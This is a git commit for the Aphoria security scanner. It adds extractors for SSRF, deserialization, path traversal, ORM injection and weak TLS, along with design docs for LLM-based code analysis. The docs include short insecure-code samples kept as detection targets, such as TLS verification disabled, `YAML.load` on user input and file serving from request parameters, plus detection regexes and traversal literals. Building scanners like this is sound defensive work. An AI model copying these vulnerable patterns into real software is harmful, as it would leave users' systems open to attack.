feat: Aphoria security extractors + LLM evaluation architecture + ontology docs

New security extractors:
- insecure_deserialization, orm_injection, path_traversal, security_headers
- ssrf, unvalidated_redirects, weak_password, xxe
- Enhanced tls_version extractor with comprehensive cipher/protocol checks

Architecture docs:
- Scout-judge extraction pattern for LLM-based code analysis
- LLM prompt evaluation framework
- LLM eval implementation guide

Core improvements:
- stemedb-ontology README and client enhancements
- WAL journal/segment instrumentation
- Signing and ingestion refinements
- Consumer health demo script

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
jordan 2026-02-05 15:22:55 -07:00
parent 41c676a78e
commit bbe6aedc40
34 changed files with 7477 additions and 326 deletions


@ -40,6 +40,13 @@ Token-efficient fact storage for StemeDB. Query these for quick context without
| Phase 6 UAT | `features/phase6-uat.md` | High | 2026-02-02 | Distributed writes UAT results and fixes |
| Aphoria Config | `features/aphoria-config.md` | High | 2026-02-04 | Configuration options including hosted mode |
## Domain Ontology
| Topic | File | Confidence | Updated | Summary |
|-------|------|------------|---------|---------|
| Adding a Domain | `../docs/guides/adding-a-domain.md` | High | 2026-02-05 | Step-by-step guide for implementing new domains |
| Ontology Crate | `../crates/stemedb-ontology/README.md` | High | 2026-02-05 | Module overview, CLI usage, architecture |
## Use Cases
See [use-cases/README.md](../use-cases/README.md) for production scenarios with Postgres Test analysis.


@ -299,6 +299,22 @@ exclude = ["vendor://acme/internal/*"]
- Edge case analysis
- Real-world adoption path
### LLM Extraction Quality
**Problem:** How do we ensure LLM prompts produce consistent, high-quality extraction results?
5. **[LLM Prompt Evaluation - Vision](./llm-prompt-evaluation.md)**
- Problem statement and enterprise requirements
- Architecture overview and core components
- Fixture format design
- CI/CD integration patterns
6. **[LLM Prompt Evaluation - Implementation](./llm-eval-implementation.md)** ← START HERE
- Actionable implementation spec
- Code snippets and file locations
- 5-phase implementation plan (11 days)
- Seed fixture list
---
## Quick Reference
@ -307,14 +323,16 @@ exclude = ["vendor://acme/internal/*"]
| If you need to... | Read this |
|-------------------|-----------|
| Understand the problem | [Concept Matching Analysis](./concept-matching-analysis.md) |
| Implement the solution | [Policy Alias Implementation](./policy-alias-implementation.md) |
| Understand concept matching | [Concept Matching Analysis](./concept-matching-analysis.md) |
| Implement policy aliases | [Policy Alias Implementation](./policy-alias-implementation.md) |
| Understand design philosophy | [Matching Philosophy](./matching-philosophy.md) |
| Validate enterprise scenarios | [Enterprise Validation](./enterprise-validation.md) |
| Test/evaluate LLM prompts | [LLM Eval Implementation](./llm-eval-implementation.md) |
| Add a new extractor | `src/extractors/mod.rs` |
| Understand scan flow | `src/scan.rs` |
| Modify conflict detection | `src/episteme/conflict.rs` |
| Work with Trust Packs | `src/policy.rs`, `src/policy_ops.rs` |
| Work with LLM extraction | `src/llm/` |
---
@ -364,6 +382,29 @@ exclude = ["vendor://acme/internal/*"]
- ✅ Works for RFC/OWASP corpus by design
- ⚠️ Breaks for enterprise policies with different hierarchies (solved by AD-001)
### AD-004: LLM Prompt Evaluation System
**Status:** Proposed (2026-02-05)
**Context:** LLM prompts that drive claim extraction are code, but we don't treat them like code. No tests, no metrics, no regression detection. When prompts change, we don't know if quality improved or degraded.
**Decision:** Build a comprehensive prompt evaluation system with:
- Golden corpus of test fixtures with expected outcomes
- Observation logging for every extraction
- Metrics computation (precision, recall, F1, cost)
- Regression detection against baselines
- CI integration (smoke tests per-PR, full eval nightly)
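To make the metrics bullet concrete, here is a minimal sketch of how precision, recall, and F1 could be computed from per-run counts. The `EvalCounts` type and its field names are hypothetical and not taken from the spec; returning 0.0 for an empty denominator is also an assumption.

```rust
/// Hypothetical tally of extraction outcomes over one golden-corpus run.
#[derive(Debug, Clone, Copy)]
pub struct EvalCounts {
    pub true_positives: u32,
    pub false_positives: u32,
    pub false_negatives: u32,
}

impl EvalCounts {
    /// Fraction of extracted claims that were expected.
    pub fn precision(&self) -> f64 {
        ratio(self.true_positives, self.true_positives + self.false_positives)
    }

    /// Fraction of expected claims that were extracted.
    pub fn recall(&self) -> f64 {
        ratio(self.true_positives, self.true_positives + self.false_negatives)
    }

    /// Harmonic mean of precision and recall.
    pub fn f1(&self) -> f64 {
        let (p, r) = (self.precision(), self.recall());
        if p + r == 0.0 {
            0.0
        } else {
            2.0 * p * r / (p + r)
        }
    }
}

/// Division that yields 0.0 instead of NaN when the denominator is zero.
fn ratio(num: u32, den: u32) -> f64 {
    if den == 0 {
        0.0
    } else {
        f64::from(num) / f64::from(den)
    }
}
```

A regression check could then compare `f1()` for the current prompt against a stored baseline value.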
**Implementation:** See [LLM Prompt Evaluation Spec](./llm-prompt-evaluation.md)
**Consequences:**
- ✅ Prompt changes are validated before deployment
- ✅ Regressions are caught automatically
- ✅ Quality is measurable over time
- ✅ Enterprise confidence in extraction reliability
- ⚠️ Requires maintaining golden corpus
- ⚠️ Live evaluation has token cost
---
## Design Principles
@ -396,8 +437,11 @@ Community sharing is opt-in with anonymization enabled by default.
- Declarative extractors (user-defined in TOML)
- Hosted mode (team aggregation)
- Community corpus (anonymous sharing)
- LLM-in-the-loop extraction (Gemini semantic claims)
- Pattern learning (LLM-extracted patterns remembered)
### In Progress
- **LLM Prompt Evaluation** - Testing, metrics, and regression detection for prompts ([Spec](./llm-prompt-evaluation.md))
- **Policy aliases** - Enterprise policy matching via glob patterns ([AD-001](./policy-alias-implementation.md))
### Planned (Q1 2026)

File diff suppressed because it is too large

File diff suppressed because it is too large


@ -0,0 +1,203 @@
# Scout & Judge: Hybrid Deterministic-Probabilistic Extraction Architecture
> **Status:** Proposed (2026-02-05)
> **Phase:** 7.9 (Replaces monolithic LLM extraction)
> **Context:** Evolution of Phase 7.5 (LLM-in-the-Loop)
---
## 1. Problem Statement
The current LLM extraction pipeline ("Monolithic Mode") treats code files as unstructured text. It feeds entire files to the LLM to find security claims.
**Issues with Monolithic Mode:**
1. **Cost:** 90% of a file is irrelevant to security (imports, UI logic, helpers), yet we pay for every token.
2. **Recall:** LLMs struggle to find "needles in haystacks" (long context window degradation).
3. **Hallucination:** Irrelevant code confuses the model, leading to false positives.
4. **Latency:** Processing large files is slow/blocking.
## 2. The Solution: Scout & Judge Architecture
We decouple the **discovery** of potential claims from the **analysis** of those claims.
* **The Scout (Deterministic):** Uses Abstract Syntax Trees (AST) via `tree-sitter` to find *Regions of Interest* (ROIs) locally, at parse speed and with no LLM token cost.
* **The Judge (Probabilistic):** Uses the LLM to analyze *only* the specific ROI snippet to extract semantic meaning and confidence.
### Architectural Diagram
```mermaid
graph TD
File[Source File] -->|Input| Scout["AST Scout (Tree-sitter)"]
subgraph "The Scout (Local/Fast)"
Scout -->|Parse| AST
AST -->|Query| Query[SCM Queries]
Query -->|Match| Candidate[Candidate Node]
Candidate -->|Expand| Snippet[Context Snippet]
end
Snippet -->|Input| Judge["LLM Judge (Gemini/Claude)"]
subgraph "The Judge (Remote/Smart)"
Judge -->|Prompt: Analyze this specific call| Claims[Structured Claims]
end
Claims -->|Output| Aggregator[Claim Aggregator]
```
---
## 3. Component Details
### 3.1 The Scout (Tree-sitter)
The Scout's job is **High Recall**. It should find *anything* that *might* be relevant. It does not need to be precise.
**Technology:** `tree-sitter` (Rust bindings)
**Workflow:**
1. **Detect Language:** Identify file type (Python, Go, Rust, JS).
2. **Parse:** Generate AST.
3. **Query:** Run SCM (S-expression) queries to find patterns.
**Example Query (Python TLS):**
```scm
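; tree-sitter-python names the call node `call` (not `call_expression`).
(call
  function: (attribute) @func
  arguments: (argument_list
    (keyword_argument
      name: (identifier) @arg_name
      value: (_) @value))
  ; The dot is double-escaped so the regex sees a literal `.`.
  (#match? @func "requests\\.(get|post|put|delete)")
  (#eq? @arg_name "verify"))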
```
**Context Expansion:**
The Scout doesn't just grab the line. It grabs the **Logical Context**:
* The function call itself.
* Variable definitions referenced in the call (simple static analysis).
* Surrounding 5 lines for comments.
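The "surrounding lines" part of context expansion can be sketched with the standard library alone. This is an illustration under stated assumptions, not the Scout's implementation: `expand_context` and `snippet` are hypothetical names, line numbers are taken to be 1-based and inclusive, and resolving referenced variable definitions is not covered.

```rust
/// Returns the inclusive 1-based line range covering a match plus `margin`
/// lines on each side, clamped to the file. Returns `None` for an invalid
/// match range.
pub fn expand_context(
    total_lines: usize,
    match_start: usize,
    match_end: usize,
    margin: usize,
) -> Option<(usize, usize)> {
    if match_start == 0 || match_start > match_end || match_end > total_lines {
        return None;
    }
    let start = match_start.saturating_sub(margin).max(1);
    let end = (match_end + margin).min(total_lines);
    Some((start, end))
}

/// Extracts the text of the expanded range from the full source.
pub fn snippet(
    source: &str,
    match_start: usize,
    match_end: usize,
    margin: usize,
) -> Option<String> {
    let lines: Vec<&str> = source.lines().collect();
    let (start, end) = expand_context(lines.len(), match_start, match_end, margin)?;
    Some(lines[start - 1..end].join("\n"))
}
```

With `margin = 5`, a match on line 10 of a 20-line file expands to lines 5 through 15, while a match near the top or bottom of the file is clamped to the file bounds.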
### 3.2 The Judge (LLM)
The Judge's job is **High Precision**. It receives a focused prompt and determines if a claim exists.
**Input Prompt:**
```text
You are a security analyst.
Analyze this code snippet for TLS verification settings.
SNIPPET:
# Dev override
should_verify = False
requests.get(url, verify=should_verify)
CONTEXT:
Variable `should_verify` is defined on line 2.
TASK:
Does this snippet disable TLS verification?
Output JSON: { "subject": "tls/verification", "value": false, "confidence": 0.95 }
```
**Why this wins:**
* **Token Efficiency:** Input reduced from 2000 tokens (file) to ~100 tokens (snippet).
* **Accuracy:** Model has no distractions.
* **Speed:** Parallelizable per-snippet.
---
## 4. Implementation Plan
### Phase 1: Infrastructure (Dependencies)
Add `tree-sitter` support to `Cargo.toml`.
```toml
[dependencies]
tree-sitter = "0.20"
tree-sitter-python = "0.20"
tree-sitter-javascript = "0.20"
tree-sitter-go = "0.20"
tree-sitter-rust = "0.20"
```
### Phase 2: The Scout Engine (`src/scout/`)
Create a new module `applications/aphoria/src/scout/`.
* `mod.rs`: Public interface.
* `engine.rs`: Orchestrates parsing and querying.
* `queries/`: Directory containing `.scm` query files for each category/language.
* `python/tls.scm`
* `go/sql_injection.scm`
**Struct definition:**
```rust
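use std::collections::HashMap;

/// A region of interest found by the Scout, ready to hand to the Judge.
pub struct CandidateSnippet {
    pub file_path: String,
    pub language: Language, // the crate's existing `Language` enum
    pub start_line: usize,
    pub end_line: usize,
    pub code: String,
    pub context_variables: HashMap<String, String>, // Name -> Value/Definition
    pub query_id: String, // Which query found this
}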
```
### Phase 3: The Judge Engine (`src/llm/judge.rs`)
Refactor `LlmExtractor` to support "Judge Mode".
* Modify `extract()` to accept `CandidateSnippet` instead of full file content.
* Create specialized prompts for specific query IDs (e.g., if Scout found a TLS pattern, use the specialized "TLS Judge" prompt, not the generic one).
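One way the per-query prompt selection could look is sketched below. Everything here is an assumption for illustration: the function names, the `language/category` query id format (mirroring the `.scm` file layout), and the task wording for categories other than TLS.

```rust
/// Picks a task question from a Scout query id such as "python/tls".
/// The id format is an assumption based on the `.scm` file layout.
pub fn judge_task(query_id: &str) -> &'static str {
    // The category is the last path component: "python/tls" -> "tls".
    let category = query_id.rsplit('/').next().unwrap_or(query_id);
    match category {
        "tls" => "Does this snippet disable TLS verification?",
        "sql_injection" => "Does this snippet build SQL from untrusted input?",
        // Generic fallback for categories without a specialized prompt.
        _ => "Does this snippet make a security-relevant claim?",
    }
}

/// Assembles a focused prompt in the SNIPPET / CONTEXT / TASK layout.
pub fn build_judge_prompt(query_id: &str, code: &str, context: &[&str]) -> String {
    format!(
        "You are a security analyst.\nSNIPPET:\n{}\nCONTEXT:\n{}\nTASK:\n{}\n",
        code,
        context.join("\n"),
        judge_task(query_id)
    )
}
```

Keeping the task text in one `match` means adding a new Scout query category only requires one new arm, with the generic question as the fallback.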
### Phase 4: Integration
Modify the main `scan` loop:
1. **Regex Extractors** run first (unchanged).
2. **Scout** runs on all files (extremely fast).
3. **Deduplicate:** If Scout finds a region already handled by Regex, drop it.
4. **Judge:** Send remaining Candidates to LLM.
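The deduplication step (3) can be sketched as a line-range overlap check. The `Span` type and `drop_handled` function are hypothetical names; the sketch assumes both regex findings and Scout candidates can be reduced to a file path plus an inclusive line range.

```rust
/// Hypothetical inclusive line span within one file.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Span {
    pub file_path: String,
    pub start_line: usize,
    pub end_line: usize,
}

impl Span {
    /// True when both spans are in the same file and share at least one line.
    fn overlaps(&self, other: &Span) -> bool {
        self.file_path == other.file_path
            && self.start_line <= other.end_line
            && other.start_line <= self.end_line
    }
}

/// Keeps only the Scout candidates that no regex finding overlaps,
/// so the Judge is not asked about regions that are already handled.
pub fn drop_handled(candidates: Vec<Span>, regex_findings: &[Span]) -> Vec<Span> {
    candidates
        .into_iter()
        .filter(|c| !regex_findings.iter().any(|r| c.overlaps(r)))
        .collect()
}
```

This is quadratic in the number of spans, which is probably acceptable per file; sorting spans by start line would be the natural next step if it ever became a bottleneck.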
---
## 5. Evaluation & Metrics
The "Prompt Evaluation System" (Phase 7.8) adapts to this model:
**1. Scout Evaluation (Deterministic):**
* **Metric:** Recall. "Did the Scout find the vulnerable line in `fixtures/tls/bad.py`?"
* **Test:** Unit tests using `tree-sitter` queries against code snippets. No LLM required.
**2. Judge Evaluation (Probabilistic):**
* **Metric:** Precision/Accuracy. "Given the snippet, did the LLM classify it correctly?"
* **Fixture:** `tests/llm_fixtures` now contains *snippets* derived from the Golden Corpus files.
**3. Cost Efficiency Metric:**
* Track `tokens_per_claim`.
* Goal: Reduce tokens/claim by >80% compared to Monolithic approach.
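A small sketch of how the cost metric and its goal could be checked. The function names are hypothetical, and the 80% threshold is the goal stated above.

```rust
/// Average tokens spent per extracted claim, or `None` when no claims exist.
pub fn tokens_per_claim(total_tokens: u64, claims: u64) -> Option<f64> {
    if claims == 0 {
        None
    } else {
        Some(total_tokens as f64 / claims as f64)
    }
}

/// Percentage reduction of `candidate` relative to `baseline`.
pub fn reduction_pct(baseline: f64, candidate: f64) -> Option<f64> {
    if baseline <= 0.0 {
        None
    } else {
        Some((baseline - candidate) / baseline * 100.0)
    }
}

/// True when the candidate pipeline cuts tokens per claim by more than 80%.
pub fn meets_cost_goal(baseline: f64, candidate: f64) -> bool {
    reduction_pct(baseline, candidate).map_or(false, |pct| pct > 80.0)
}
```

Using the figures quoted earlier (about 2000 tokens for a whole file versus about 100 for a snippet, one claim each), the reduction works out to 95%, which would meet the goal.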
## 6. Migration Strategy
1. **Parallel Run:** Run Scout logic alongside Regex logic in "shadow mode" (logging only) to tune queries.
2. **Incremental Rollout:** Enable Scout & Judge for **one category** (e.g., TLS) while leaving others in Monolithic mode (if any) or Regex mode.
3. **Full Switch:** Deprecate "Monolithic Mode" prompts.
---
## 7. Comparison Summary
| Feature | Current (Monolithic) | Scout & Judge (Proposed) |
| :--- | :--- | :--- |
| **Trigger** | File name heuristic | AST Pattern Match |
| **Input** | Whole File | Relevant Snippet |
| **Context** | Noisy (imports, unrelated code) | Focused (local scope) |
| **Cost** | $$$ (Linear to file size) | ¢ (Linear to *relevant* code) |
| **Reliability** | Low (Lost in middle) | High (Forced focus) |
| **Maintenance** | Prompt Engineering | Query Engineering + Simple Prompts |


@ -1142,7 +1142,7 @@ auto_promote = false # Require human approval (Phase 7.7)
---
## Phase 7.7: Pattern → Extractor Promotion
## Phase 7.7: Pattern → Extractor Promotion
> High-frequency learned patterns get promoted to declarative extractors. This closes the learning loop: patterns discovered by LLM become permanent, fast regex extractors.
@ -1162,15 +1162,17 @@ Human review (optional) → Approve/Reject
Merge to project's .aphoria/extractors/
```
### 7.7.1 Promotion Pipeline
### 7.7.1 Promotion Pipeline
| Task | Description |
|------|-------------|
| Candidate selection | Query patterns meeting threshold |
| Regex generation | LLM generates regex from examples |
| YAML generation | Convert to declarative extractor format |
| Validation | Test against all stored examples |
| Review queue | Present candidates for human approval |
| Task | Status |
|------|--------|
| `PromotionPipeline` | ✅ `promotion/pipeline.rs` — orchestrates full promotion flow |
| `RegexGenerator` | ✅ `promotion/regex_gen.rs` — Gemini LLM integration |
| `ExtractorValidator` | ✅ `promotion/validator.rs` — ReDoS detection, timing validation |
| `YamlWriter` | ✅ `promotion/writer.rs` — outputs to `.aphoria/extractors/learned/` |
| `InteractiveReviewer` | ✅ `promotion/review.rs` — CLI review workflow |
| `PromotionCandidate` | ✅ `promotion/types.rs` |
| `ValidationResult` | ✅ `promotion/types.rs` |
```rust
pub struct PromotionPipeline {
@ -1216,13 +1218,13 @@ impl PromotionPipeline {
}
```
### 7.7.2 Regex Generation
### 7.7.2 Regex Generation
| Task | Description |
|------|-------------|
| Multi-example prompt | Include all examples in generation prompt |
| Regex safety | Prevent catastrophic backtracking |
| Test coverage | Generate test cases alongside regex |
| Task | Status |
|------|--------|
| Multi-example prompt | ✅ Includes all examples in generation prompt |
| Regex safety | ✅ ReDoS detection prevents catastrophic backtracking |
| Test coverage | ✅ Validates against stored examples |
```rust
async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<String> {
@ -1244,14 +1246,14 @@ async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<St
}
```
### 7.7.3 Validation Suite
### 7.7.3 Validation Suite
| Task | Description |
|------|-------------|
| Positive tests | Must match all stored examples |
| Negative tests | Must NOT match known-safe code |
| Performance test | Must complete in < 100ms |
| False positive check | Run against sample codebase |
| Task | Status |
|------|--------|
| Positive tests | ✅ Must match all stored examples |
| ReDoS detection | ✅ Detects catastrophic backtracking patterns |
| Performance test | ✅ Timing validation with configurable threshold |
| False positive check | ⬜ Deferred to Phase 9 (sample codebase FP testing) |
```rust
pub struct ExtractorValidator {
@ -1292,14 +1294,17 @@ impl ExtractorValidator {
}
```
### 7.7.4 Human Review Gate
### 7.7.4 Human Review Gate
| Task | Description |
|------|-------------|
| `aphoria extractors review` | CLI to review pending promotions |
| Approval workflow | Approve, reject, or request changes |
| Rejection tracking | Record why patterns were rejected |
| Auto-approve mode | Skip review for >0.95 confidence (Phase 9) |
| Task | Status |
|------|--------|
| `aphoria extractors review` | ✅ CLI to review pending promotions |
| `aphoria extractors stats` | ✅ Show pattern store statistics |
| `aphoria extractors candidates` | ✅ List promotion candidates |
| `aphoria extractors promote` | ✅ Promote pattern to extractor |
| Approval workflow | ✅ Approve, reject, or skip via InteractiveReviewer |
| Rejection tracking | ⬜ Deferred to Phase 9 (rejection reason persistence) |
| Auto-approve mode | ⬜ Deferred to Phase 9 (>0.95 confidence auto-promote) |
```bash
$ aphoria extractors review
@ -1320,9 +1325,9 @@ Pending promotions: 3
[a]pprove [r]eject [e]dit [s]kip [q]uit: _
```
### 7.7.5 Extractor Output
### 7.7.5 Extractor Output
Promoted patterns become declarative extractors in `.aphoria/extractors/`:
Promoted patterns become declarative extractors in `.aphoria/extractors/learned/`:
```yaml
# .aphoria/extractors/learned/tls_min_version_const.yaml
@ -1348,7 +1353,7 @@ metadata:
confidence: 0.91
```
### 7.7.6 Configuration
### 7.7.6 Configuration
```toml
# aphoria.toml
@ -1357,14 +1362,13 @@ enabled = true # Enable promotion pipeline
auto_promote = false # Require human approval
output_dir = ".aphoria/extractors/learned"
min_confidence = 0.8 # Minimum to consider
min_projects = 5 # Projects needed before promotion
require_validation = true # Must pass validation suite
[promotion.review]
notify = "slack://webhook/..." # Notify when candidates ready
batch_size = 10 # Max candidates per review session
```
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`, `promotion/writer.rs`, `promotion/types.rs`, `handlers/extractors.rs`
**Tests:** 43 tests covering pipeline, validation, regex generation, and YAML output.
---
@ -1549,14 +1553,14 @@ contribute_patterns = true # Share patterns to community
| 7 | Declarative Extractors | Phase 6 | ✅ |
| **7.5** | **LLM-in-the-Loop Extraction (Gemini)** | Phase 7 | ✅ |
| **7.6** | **Pattern Learning Store** | Phase 7.5 | ✅ |
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | ⬜ |
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | ✅ |
| 8 | Enterprise Extractors (MVP: 8.1, 8.6, 8.11) | Phase 7.5 | ✅ |
| **9** | **Autonomous Extractor Generation** | Phase 8 | ⬜ |
**Current state:**
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 8 (MVP) complete (clippy clean)
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 7.7, 8 (MVP) complete (clippy clean)
- Full corpus: RFC, OWASP, Vendor sources
- 17 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies)
- 25 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies, path_traversal, unvalidated_redirects, weak_password, security_headers, insecure_deserialization, ssrf, orm_injection, xxe)
- Trust Packs: signed policy bundles with import/export
- Ephemeral mode: 40x faster for CI
- Observation write-back: `--sync` records novel claims as Tier 4 project memory
@ -1567,10 +1571,11 @@ contribute_patterns = true # Share patterns to community
- Community Corpus: Opt-in anonymous pattern sharing with privacy-preserving anonymization
- Declarative Extractors: TOML-defined custom extractors without Rust code
- LLM Extraction: Gemini-powered semantic claim extraction for high-value files
- Enterprise Extractors MVP: High-entropy secrets (Shannon entropy), auth bypass patterns, insecure cookie flags
- Enterprise Extractors: High-entropy secrets, auth bypass, insecure cookies, path traversal, unvalidated redirects, weak passwords, security headers, insecure deserialization, SSRF, ORM injection, XXE
- Pattern Learning: LLM-extracted claims recorded for promotion to declarative extractors
- Pattern Promotion: CLI workflow to promote learned patterns to declarative extractors with Gemini regex generation and validation
**Next:** Phase 7.7 → 8 (full) → 9 (Self-Learning Extraction System)
**Next:** Phase 8 (full) → 9 (Self-Learning Extraction System)
### The Self-Learning Vision
@ -1581,11 +1586,11 @@ Phase 7.5: LLM-in-the-Loop (Gemini semantic extraction) ✅ COMPLETE
Phase 7.6: Pattern Learning (remember what LLM finds) ✅ COMPLETE
Phase 7.7: Pattern Promotion (patterns → extractors) ⬜ NEXT
Phase 7.7: Pattern Promotion (patterns → extractors) ✅ COMPLETE
Phase 8: Enterprise Extractors (generated + curated) ✅ MVP (8.1, 8.6, 8.11)
Phase 9: Autonomous Generation (fully self-improving) ⬜
Phase 9: Autonomous Generation (fully self-improving) ⬜ NEXT
```
**The endgame:** Every PR teaches Aphoria. After a month, it knows your security patterns better than your team does.
@ -1744,34 +1749,51 @@ fn extract_config_claims(config: &ConfigValue, path: &[String]) -> Vec<Extracted
---
### 8.4 Semantic TLS Version Detection
### 8.4 Semantic TLS Version Detection
**Impact:** MEDIUM | **Effort:** MEDIUM
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
Current `tls_version` misses:
```rust
const TLS_MIN_VERSION: &str = "1.0"; // Not caught!
const MIN_TLS: &str = "TLSv1"; // Not caught!
```
| Task | Status |
|------|--------|
| Add `Language::Terraform` variant | ✅ `types/language.rs` |
| Semantic pattern (cross-language) | ✅ Catches `TLS_MIN_VERSION = "1.0"` with type annotations |
| Environment variable pattern | ✅ `.env` files with `TLS_MIN_VERSION=1.0` |
| Terraform HCL pattern | ✅ `min_tls_version = "TLS1_0"` |
| Kubernetes camelCase pattern | ✅ `minTLSVersion: VersionTLS10` |
| False positive prevention | ✅ TLS 1.2/1.3 not flagged |
| Tests | ✅ 16 new tests (27 total for TLS extractor) |
**Implementation:**
```rust
// Semantic pattern: variable name suggests TLS + value is deprecated
let semantic_tls = Regex::new(
    r#"(?i)(tls|ssl)_?(min|minimum|version)[^=]*[:=]\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL)"#
).unwrap();
```
**Patterns now caught:**
- `const TLS_MIN_VERSION: &str = "1.0";` (Rust with type annotation)
- `let sslVersion = "TLSv1";` (JavaScript camelCase)
- `TLS_MINIMUM_VERSION = "1.1"` (Python assignment)
- `TLS_MIN_VERSION=1.0` (dotenv)
- `export SSL_VERSION=TLSv1` (shell export)
- `min_tls_version = "TLS1_0"` (Terraform)
- `minTLSVersion: VersionTLS10` (Kubernetes YAML)
**Also catch:**
- Environment variables: `TLS_MIN_VERSION=1.0`
- Terraform: `min_tls_version = "TLS1_0"`
- Kubernetes: `minTLSVersion: VersionTLS10`
**Languages:** Rust, Go, Python, TypeScript, JavaScript, Yaml, Toml, Json, Terraform, Dotenv
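The value side of these patterns (deprecated versions flagged, TLS 1.2/1.3 left alone) can be illustrated without a regex. This is a standalone sketch, not the extractor's logic: `is_deprecated_tls` is a hypothetical helper that normalizes the value spellings listed above and treats any SSL value, TLS 1.0, and TLS 1.1 as deprecated.

```rust
/// Returns true when a configured value names SSL, TLS 1.0, or TLS 1.1.
/// Accepts spellings such as "1.0", "TLSv1", "TLS1_0", and "VersionTLS10".
pub fn is_deprecated_tls(value: &str) -> bool {
    let cleaned = value
        .trim()
        .trim_matches(|c| c == '"' || c == '\'')
        .to_ascii_lowercase();
    let s = cleaned.as_str();

    // Every SSL protocol version is deprecated.
    if s.starts_with("ssl") {
        return true;
    }

    // Strip the known prefixes: "version", then "tls", then "v".
    let s = s.strip_prefix("version").unwrap_or(s);
    let s = s.strip_prefix("tls").unwrap_or(s);
    let s = s.strip_prefix('v').unwrap_or(s);

    // Drop separators so "1.0", "1_0", and "10" compare equal.
    let digits: String = s.chars().filter(|c| c.is_ascii_digit()).collect();

    // A bare "1" (as in "TLSv1") means TLS 1.0.
    matches!(digits.as_str(), "1" | "10" | "11")
}
```

Comparing the normalized digits exactly, instead of matching a prefix, is what keeps values such as `TLSv1.2` from being flagged.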
---
### 8.5 ORM SQL Injection Detection
### 8.5 ORM SQL Injection Detection
**Impact:** MEDIUM | **Effort:** MEDIUM
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `OrmInjectionExtractor` | ✅ `extractors/orm_injection.rs` |
| Django .raw() with interpolation | ✅ `f"SELECT..."`, `.format()` patterns |
| Django .extra() with interpolation | ✅ `where=["...{}...".format()]` |
| SQLAlchemy text() with interpolation | ✅ `text(f"SELECT...")` |
| SQLAlchemy execute() with f-string | ✅ `execute(f"...")` |
| Sequelize raw query | ✅ `` sequelize.query(`...${...}`) `` |
| TypeORM where() | ✅ `` .where(`...${...}`) `` |
| GORM Raw() with Sprintf | ✅ `.Raw(fmt.Sprintf(...))` |
| Prisma $queryRawUnsafe | ✅ `` $queryRawUnsafe(`...${...}`) `` |
| Tests | ✅ 8+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Current `sql_injection` catches raw string interpolation but misses ORM escape hatches:
@ -1833,9 +1855,23 @@ if os.environ.get("SKIP_AUTH") == "true":
---
### 8.7 Insecure Deserialization
### 8.7 Insecure Deserialization
**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `InsecureDeserializationExtractor` | ✅ `extractors/insecure_deserialization.rs` |
| Python pickle (critical) | ✅ `pickle.load()`, `pickle.loads()`, `Unpickler()` |
| Python yaml.load without SafeLoader | ✅ Detects missing SafeLoader |
| Python marshal | ✅ `marshal.load()`, `marshal.loads()` |
| Python eval/exec with user input | ✅ `eval(request...)`, `exec(user...)` |
| JavaScript node-serialize | ✅ `require('node-serialize')`, `.unserialize()` |
| Go gob decoder | ✅ `gob.NewDecoder()`, `gob.Decode()` |
| Java ObjectInputStream (polyglot) | ✅ `ObjectInputStream`, `readObject()` |
| Tests | ✅ 10+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Unsafe deserialization of untrusted data:
@ -1861,9 +1897,24 @@ YAML.load(user_input) # Should use safe_load
---
### 8.8 Path Traversal Patterns
### 8.8 Path Traversal Patterns
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `PathTraversalExtractor` | ✅ `extractors/path_traversal.rs` |
| Python open/read/write with user input | ✅ `open(request...)`, `read(params...)` |
| Python os.path.join with user input | ✅ `os.path.join(base, request...)` |
| JavaScript fs operations | ✅ `fs.readFile(req...)`, `fs.writeFile(params...)` |
| JavaScript path.join/resolve | ✅ `path.join(base, req.query...)` |
| JavaScript res.sendFile | ✅ `res.sendFile(req.params...)` |
| Go filepath operations | ✅ `filepath.Join(base, r...)`, `os.Open(req...)` |
| Rust path operations | ✅ `Path::new(request...)`, `std::fs::read(user...)` |
| Traversal literals | ✅ `../`, `%2e%2e` URL-encoded patterns |
| Tests | ✅ 8+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, Rust
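The "traversal literals" row is the simplest of these checks to show in isolation. The helper below is a hypothetical sketch covering only the two literals named in the table (`../` and URL-encoded `%2e%2e`); the real extractor's patterns may differ.

```rust
/// Returns true when the text contains a literal traversal sequence,
/// either plain (`../`) or URL-encoded (`%2e%2e`, case-insensitive).
pub fn has_traversal_literal(text: &str) -> bool {
    let lower = text.to_ascii_lowercase();
    lower.contains("../") || lower.contains("%2e%2e")
}
```

Lowercasing first lets `%2E%2E` and `%2e%2e` match the same needle, while a name like `file..txt` is not flagged because the dots are not followed by a slash.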
File operations with user input:
@ -1883,9 +1934,25 @@ res.sendFile(userInput)
---
### 8.9 SSRF Patterns
### 8.9 SSRF Patterns
**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `SsrfExtractor` | ✅ `extractors/ssrf.rs` |
| Python requests library | ✅ `requests.get(url)`, `requests.post(target)` |
| Python urllib | ✅ `urllib.request.urlopen(url)` |
